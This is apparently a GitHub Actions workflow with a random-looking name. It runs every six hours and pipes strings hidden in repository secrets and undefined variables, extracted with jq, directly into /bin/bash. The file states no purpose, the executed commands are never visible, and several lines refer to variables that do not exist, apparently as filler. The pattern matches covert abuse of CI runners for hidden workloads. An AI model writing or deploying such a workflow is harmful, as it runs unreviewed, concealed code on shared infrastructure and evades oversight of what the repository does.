name: duansizhi9615

on:
  workflow_dispatch:
  schedule:
    - cron: '7 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: duansizhi9615
        env:
          ru25: ${{ secrets.ru25 }}
        run: |
          echo $ru25 | jq -r .f9057 | /bin/bash
          echo $ls822 | jq -r .u532 | /bin/bash
          echo $f769 | jq -r .hbrdv24503 | /bin/bash
          echo $ccno3689 | jq -r .k79 | /bin/bash
          echo $lbyuo2 | jq -r .nwqn0 | /bin/bash
          echo $n1956 | jq -r .z6555 | /bin/bash

